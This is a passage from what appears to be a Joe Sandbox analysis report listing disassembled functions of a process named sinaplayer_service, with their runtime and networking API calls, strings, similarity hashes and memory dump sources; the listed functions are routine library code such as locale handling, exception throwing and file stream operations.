                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Location@tracked_objects@@Time$Base@internal@base@@CallbackCallback@$$Counter@tracked_objects@@DelayedDelta@2@@Delta@base@@FromLoop@base@@MessagePostProgramSeconds@Task@V12@_Z@2@
                                                                                                                                                                                                    • String ID: UploadMgr::StatTimeout$upload_mgr.cpp
                                                                                                                                                                                                    • API String ID: 1939080572-324091720
                                                                                                                                                                                                    • Opcode ID: d8396f58775da07e751afd91abfe99e0256dd84ff95f4b83398c34154564709e
                                                                                                                                                                                                    • Instruction ID: d3160304f5ad2b9db8b296924c2c761eae4292293e7ea89590c6980cc45abf4f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d8396f58775da07e751afd91abfe99e0256dd84ff95f4b83398c34154564709e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B419171900609EFCB26DF54C845EEABBF8FF05350F15866AE419AB281D735EE44CB90
                                                                                                                                                                                                    Function 0038D1D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Init@locale@std@@CAPAV_Locimp@12@_N@Z.MSVCP120(00000000,8285FFAB,?,?), ref: 0038D20B
                                                                                                                                                                                                    • ??0_Locinfo@std@@QAE@HPBD@Z.MSVCP120(?,00000000), ref: 0038D226
                                                                                                                                                                                                    • ?_Makeloc@_Locimp@locale@std@@CAPAV123@ABV_Locinfo@3@HPAV123@PBV23@@Z.MSVCP120(?,?,?,00000000), ref: 0038D278
                                                                                                                                                                                                    • ??1_Locinfo@std@@QAE@XZ.MSVCP120 ref: 0038D284
                                                                                                                                                                                                    • ?_Xruntime_error@std@@YAXPBD@Z.MSVCP120(bad locale name), ref: 0038D2AD
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(00000000,00000000), ref: 0038D2CD
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Locinfo@std@@V123@$??0_??1_ExceptionInit@locale@std@@Locimp@12@_Locimp@locale@std@@Locinfo@3@Makeloc@_ThrowV23@@Xruntime_error@std@@
                                                                                                                                                                                                    • String ID: bad locale name
                                                                                                                                                                                                    • API String ID: 2630998926-1405518554
                                                                                                                                                                                                    • Opcode ID: c3462d35cfeaf40f9e5a73ad10b2e39ca9755db7c1b010e4e589a0810fd92dae
                                                                                                                                                                                                    • Instruction ID: c309ebb090e178ae331ea6be78833b6c4efc4a8e2d0eae32af4dc98dc849bb09
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3462d35cfeaf40f9e5a73ad10b2e39ca9755db7c1b010e4e589a0810fd92dae
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F531D431604208EFCB12DFA8D985BAABBB9EF05310F140595E806DB2E0D732D904CB50
                                                                                                                                                                                                    Function 00372F00 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 101networkCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • HttpQueryInfoW.WININET(?,?,00000000,?,00000000), ref: 00372F5C
                                                                                                                                                                                                    • HttpQueryInfoW.WININET(?,?,00000000,?,00000000), ref: 00372FAF
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120(00000000,-00000002), ref: 00372FED
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00372FF6
                                                                                                                                                                                                    • ?SysWideToNativeMB@base@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@3@@Z.BASE(?,?), ref: 00373003
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00373015
                                                                                                                                                                                                      • Part of subcall function 00374790: memset.MSVCR120 ref: 003747B0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@HttpInfoQueryU?$char_traits@$B@base@@D@2@@std@@D@std@@D@std@@@std@@NativeU?$char_traits@_Unlock@?$basic_streambuf@V?$allocator@V?$allocator@_V?$basic_string@V?$basic_string@_W@2@@3@@W@std@@Widememset
                                                                                                                                                                                                    • String ID: `qml
                                                                                                                                                                                                    • API String ID: 3854038836-3674608353
                                                                                                                                                                                                    • Opcode ID: 38afac1c1012bfad68876f7e8b2eed0fcfd7f317557f3ce62d8be683b7d1f540
                                                                                                                                                                                                    • Instruction ID: 260b5dbe989f3d7ef110477d7e2ce73366e64fd2316219c909829a2d859f8772
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 38afac1c1012bfad68876f7e8b2eed0fcfd7f317557f3ce62d8be683b7d1f540
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA416BB1900248EBDF16DF94DC45BEEBBB8FF09314F144119F816A7290DB796944CBA1
                                                                                                                                                                                                    Function 00388290 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 79COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?GetProgramCounter@tracked_objects@@YAPBXXZ.BASE(00000000,00000000,?,?,?,?,?,00000000,?,00000001,00000000,0039A9DB,000000FF), ref: 00388322
                                                                                                                                                                                                    • ??0Location@tracked_objects@@QAE@PBD0HPBX@Z.BASE(net::FileStream::Context::CloseAndDelete,network_change\file_stream_context.cc,000000EF,00000000,?,?,?,?,?,00000000,?,00000001,00000000,0039A9DB,000000FF), ref: 0038833B
                                                                                                                                                                                                    • ?PostTaskAndReply@TaskRunner@base@@QAE_NABVLocation@tracked_objects@@ABV?$Callback@$$A6AXXZ@2@1@Z.BASE(00000000,?,?,?,?,?,00000000,?,00000001,00000000,0039A9DB,000000FF), ref: 00388344
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,00000000,?,00000001,00000000,0039A9DB,000000FF), ref: 00388357
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,00000000,?,00000001,00000000,0039A9DB,000000FF), ref: 00388363
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • network_change\file_stream_context.cc, xrefs: 0038832E
                                                                                                                                                                                                    • net::FileStream::Context::CloseAndDelete, xrefs: 00388333
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Base@internal@base@@CallbackLocation@tracked_objects@@Task$Callback@$$Counter@tracked_objects@@PostProgramReply@Runner@base@@Z@2@1@
                                                                                                                                                                                                    • String ID: net::FileStream::Context::CloseAndDelete$network_change\file_stream_context.cc
                                                                                                                                                                                                    • API String ID: 1359539112-1847067397
                                                                                                                                                                                                    • Opcode ID: e3d66fe2a7f28a54d508824c2cba83d83c0cbd4f9a0ff9a52b2ffa2b1a5ee65b
                                                                                                                                                                                                    • Instruction ID: 1784f0f82bdfa7f03565b4fc1a9d961497c32e92cc0b12c5fccafef21febd7ca
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e3d66fe2a7f28a54d508824c2cba83d83c0cbd4f9a0ff9a52b2ffa2b1a5ee65b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A1217E72904258EFCB12DF98DC45BEEBBBCFB09724F10029AE425A32D0D7755904CBA0
                                                                                                                                                                                                    Function 00388380 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00387B90: ??2@YAPAXI@Z.MSVCR120(00000018), ref: 00387BBF
                                                                                                                                                                                                      • Part of subcall function 00387B90: ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE ref: 00387BDA
                                                                                                                                                                                                      • Part of subcall function 00387B90: ??0CallbackBase@internal@base@@QAE@ABV012@@Z.BASE(?), ref: 00387BFE
                                                                                                                                                                                                      • Part of subcall function 00387B90: ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000), ref: 00387C15
                                                                                                                                                                                                      • Part of subcall function 00387990: ??2@YAPAXI@Z.MSVCR120(00000010), ref: 003879BF
                                                                                                                                                                                                      • Part of subcall function 00387990: ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE ref: 003879DA
                                                                                                                                                                                                      • Part of subcall function 00387990: ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000), ref: 00387A05
                                                                                                                                                                                                    • ?GetProgramCounter@tracked_objects@@YAPBXXZ.BASE(00000000,00000000,?,?,?,8285FFAB), ref: 00388408
                                                                                                                                                                                                    • ??0Location@tracked_objects@@QAE@PBD0HPBX@Z.BASE(net::FileStream::Context::CloseAsync,network_change\file_stream_context.cc,00000074,00000000,?,?,?,8285FFAB), ref: 0038841E
                                                                                                                                                                                                      • Part of subcall function 00387D00: ??2@YAPAXI@Z.MSVCR120(00000010,8285FFAB,?,?,0039B128,000000FF,?,0038842B,?,00000000,?,?,?,8285FFAB), ref: 00387D29
                                                                                                                                                                                                      • Part of subcall function 00387D00: ?PostTaskAndReply@TaskRunner@base@@QAE_NABVLocation@tracked_objects@@ABV?$Callback@$$A6AXXZ@2@1@Z.BASE(0038842B,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF), ref: 00387D9D
                                                                                                                                                                                                      • Part of subcall function 00387D00: ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF,?,0038842B,?), ref: 00387DB2
                                                                                                                                                                                                      • Part of subcall function 00387D00: ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF,?,0038842B,?), ref: 00387DBB
                                                                                                                                                                                                      • Part of subcall function 00387D00: ??3@YAXPAX@Z.MSVCR120(000000FF,?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF,?,0038842B), ref: 00387DC0
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,8285FFAB), ref: 0038843B
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,8285FFAB), ref: 00388444
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,8285FFAB), ref: 00388450
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • network_change\file_stream_context.cc, xrefs: 00388411
                                                                                                                                                                                                    • net::FileStream::Context::CloseAsync, xrefs: 00388416
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Base@internal@base@@Callback$??2@$Base@12@@Base@subtle@base@@BindCountedLocation@tracked_objects@@SafeStateTaskThread$??3@Callback@$$Counter@tracked_objects@@PostProgramReply@Runner@base@@V012@@Z@2@1@
                                                                                                                                                                                                    • String ID: net::FileStream::Context::CloseAsync$network_change\file_stream_context.cc
                                                                                                                                                                                                    • API String ID: 4200212630-4150499097
                                                                                                                                                                                                    • Opcode ID: 89d88b19818d5a4003bdc57b346add19b7b68a40be6aade1b068feb9b70f9f5a
                                                                                                                                                                                                    • Instruction ID: 8d288fc0bca3b29f6827a33066c0dfccd02b0f209c36d78db26aea621dcacd5f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 89d88b19818d5a4003bdc57b346add19b7b68a40be6aade1b068feb9b70f9f5a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE218271904248EFDB02EF94CD45BDEBBBCEB05314F10429AE815A7281DB759B04CBA1
                                                                                                                                                                                                    Function 003884B0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00387B90: ??2@YAPAXI@Z.MSVCR120(00000018), ref: 00387BBF
                                                                                                                                                                                                      • Part of subcall function 00387B90: ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE ref: 00387BDA
                                                                                                                                                                                                      • Part of subcall function 00387B90: ??0CallbackBase@internal@base@@QAE@ABV012@@Z.BASE(?), ref: 00387BFE
                                                                                                                                                                                                      • Part of subcall function 00387B90: ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000), ref: 00387C15
                                                                                                                                                                                                      • Part of subcall function 00387990: ??2@YAPAXI@Z.MSVCR120(00000010), ref: 003879BF
                                                                                                                                                                                                      • Part of subcall function 00387990: ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE ref: 003879DA
                                                                                                                                                                                                      • Part of subcall function 00387990: ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000), ref: 00387A05
                                                                                                                                                                                                    • ?GetProgramCounter@tracked_objects@@YAPBXXZ.BASE(00000000,00000000,?,?,?,8285FFAB), ref: 00388538
                                                                                                                                                                                                    • ??0Location@tracked_objects@@QAE@PBD0HPBX@Z.BASE(net::FileStream::Context::FlushAsync,network_change\file_stream_context.cc,0000009B,00000000,?,?,?,8285FFAB), ref: 00388551
                                                                                                                                                                                                      • Part of subcall function 00387D00: ??2@YAPAXI@Z.MSVCR120(00000010,8285FFAB,?,?,0039B128,000000FF,?,0038842B,?,00000000,?,?,?,8285FFAB), ref: 00387D29
                                                                                                                                                                                                      • Part of subcall function 00387D00: ?PostTaskAndReply@TaskRunner@base@@QAE_NABVLocation@tracked_objects@@ABV?$Callback@$$A6AXXZ@2@1@Z.BASE(0038842B,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF), ref: 00387D9D
                                                                                                                                                                                                      • Part of subcall function 00387D00: ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF,?,0038842B,?), ref: 00387DB2
                                                                                                                                                                                                      • Part of subcall function 00387D00: ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF,?,0038842B,?), ref: 00387DBB
                                                                                                                                                                                                      • Part of subcall function 00387D00: ??3@YAXPAX@Z.MSVCR120(000000FF,?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF,?,0038842B), ref: 00387DC0
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,8285FFAB), ref: 0038856E
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,8285FFAB), ref: 00388577
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,8285FFAB), ref: 00388583
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • network_change\file_stream_context.cc, xrefs: 00388544
                                                                                                                                                                                                    • net::FileStream::Context::FlushAsync, xrefs: 00388549
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Base@internal@base@@Callback$??2@$Base@12@@Base@subtle@base@@BindCountedLocation@tracked_objects@@SafeStateTaskThread$??3@Callback@$$Counter@tracked_objects@@PostProgramReply@Runner@base@@V012@@Z@2@1@
                                                                                                                                                                                                    • String ID: net::FileStream::Context::FlushAsync$network_change\file_stream_context.cc
                                                                                                                                                                                                    • API String ID: 4200212630-315462406
                                                                                                                                                                                                    • Opcode ID: 20e65fc73a1fe805a500f124e847a25eed7086a184c37d27359290562d207653
                                                                                                                                                                                                    • Instruction ID: 700d7d583bcbc63883b275231d15abfcb5207843b6898a73b263a8c2964b07bb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 20e65fc73a1fe805a500f124e847a25eed7086a184c37d27359290562d207653
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28215171904248EEDB02EFA4DD45BDEBBBCEB15314F10429AE815A7281D7759B04CBA1
                                                                                                                                                                                                    Function 6C5EE9F4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindCompleteObject.LIBCMT ref: 6C5EEA15
                                                                                                                                                                                                    • FindMITargetTypeInstance.LIBCMT ref: 6C5EEA4E
                                                                                                                                                                                                      • Part of subcall function 6C5EE634: strcmp.MSVCR120(?,-00000008,?,00000000,00000000), ref: 6C5EE686
                                                                                                                                                                                                      • Part of subcall function 6C5EE634: strcmp.MSVCR120(?,?,?,00000000,00000000), ref: 6C5EE6B4
                                                                                                                                                                                                      • Part of subcall function 6C5EE634: PMDtoOffset.LIBCMT ref: 6C5EE6C6
                                                                                                                                                                                                    • FindVITargetTypeInstance.LIBCMT ref: 6C5EEA55
                                                                                                                                                                                                    • PMDtoOffset.LIBCMT ref: 6C5EEA66
                                                                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT(Bad dynamic_cast!,?,?,?,?,?,6C5EEAE8,00000018), ref: 6C5EEA8F
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6C5EEB04,Bad dynamic_cast!,?,?,?,?,?,6C5EEAE8,00000018), ref: 6C5EEA9D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Find$InstanceOffsetTargetTypestrcmp$CompleteExceptionObjectThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                    • String ID: Bad dynamic_cast!
                                                                                                                                                                                                    • API String ID: 3548542081-2956939130
                                                                                                                                                                                                    • Opcode ID: 942fe3b4b3e390c3dd9701759cb712d8769192a8ee254bc16a1e38580d850c8f
                                                                                                                                                                                                    • Instruction ID: 93b4e2f5f35bd9162510210d401df824dd14ddb87111ea06ba87b09b4d24dfb7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 942fe3b4b3e390c3dd9701759cb712d8769192a8ee254bc16a1e38580d850c8f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 37218C72A20214DFCB01CFA9CC48A9E7769FB8E354F14041DE815A7A50DBB49E09DBE0
                                                                                                                                                                                                    Function 6C566FD5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 66COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6C55F764: _getptd.MSVCR120(00000001,00000000,?,6C57E01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6C55F77A
                                                                                                                                                                                                    • _strnicoll_l.MSVCR120(?,?,?,?,xL,00ED4598,00ED4C78,00000000,00ED4598,00000000,00000000,00000000), ref: 6C567029
                                                                                                                                                                                                      • Part of subcall function 6C566F4B: __crtCompareStringA.MSVCR120(?,?,00001001,00ED4598,?,?,?,00000000,00000000,?,7FFFFFFF,00000000,?,xL,00ED4598,00ED4C78), ref: 6C566FAF
                                                                                                                                                                                                    • _errno.MSVCR120(xL,00ED4598,00ED4C78,00000000,00ED4598,00000000,00000000,00000000), ref: 6C5A777C
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(xL,00ED4598,00ED4C78,00000000,00ED4598,00000000,00000000,00000000), ref: 6C5A7787
                                                                                                                                                                                                    • _errno.MSVCR120(xL,00ED4598,00ED4C78,00000000,00ED4598,00000000,00000000,00000000), ref: 6C5A7796
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(xL,00ED4598,00ED4C78,00000000,00ED4598,00000000,00000000,00000000), ref: 6C5A77A1
                                                                                                                                                                                                    • __crtCompareStringA.MSVCR120(?,?,00001001,?,?,?,?,?,xL,00ED4598,00ED4C78,00000000,00ED4598,00000000,00000000,00000000), ref: 6C5A77C1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CompareString__crt_errno_invalid_parameter_noinfo$_getptd_strnicoll_l
                                                                                                                                                                                                    • String ID: xL
                                                                                                                                                                                                    • API String ID: 1228067600-2859553101
                                                                                                                                                                                                    • Opcode ID: 26e6da545074f4cdd8a504864dee35bddd7cbb4341ca73ddcb67acf8c5d46a9e
                                                                                                                                                                                                    • Instruction ID: b5980671195dc14b13cbf421e31305c9627ec7a1f39e6fb43dd9b1c040cdc1d4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 26e6da545074f4cdd8a504864dee35bddd7cbb4341ca73ddcb67acf8c5d46a9e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92118171901106EFEB14DEA6CC40ABFB769EF453B4F104658E83097EA0DB319C118BE1
                                                                                                                                                                                                    Function 00390730 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: fprintf$_wfopen_sfclosefputs
                                                                                                                                                                                                    • String ID: %d$GBP1
                                                                                                                                                                                                    • API String ID: 2869316018-3547967902
                                                                                                                                                                                                    • Opcode ID: 43575812e03a906d9dacbed6906a0fc7c7ec9fdc455af2f177a4943285e2567e
                                                                                                                                                                                                    • Instruction ID: 99af0ccbc4929d9b9c4052fd806be3217c100b26ab3f19138b02ed2a38e4c6fa
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 43575812e03a906d9dacbed6906a0fc7c7ec9fdc455af2f177a4943285e2567e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C015A76100204BFCF169F94DC45A993FA9FF0835AF20402AF9489A062C372E9A6CFD1
                                                                                                                                                                                                    Function 6C55EE11 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • malloc.MSVCR120(?), ref: 6C55EE1A
                                                                                                                                                                                                      • Part of subcall function 6C55ED30: HeapAlloc.KERNEL32(00EB0000,00000000,6C5CC0AD,00000000,?,00000000,?,6C56223C,6C5CC0AD,6C633B90,6C633B90,?,?,6C5CC0AD,?,00000000), ref: 6C55ED5D
                                                                                                                                                                                                    • _callnewh.MSVCR120(?), ref: 6C5ADA32
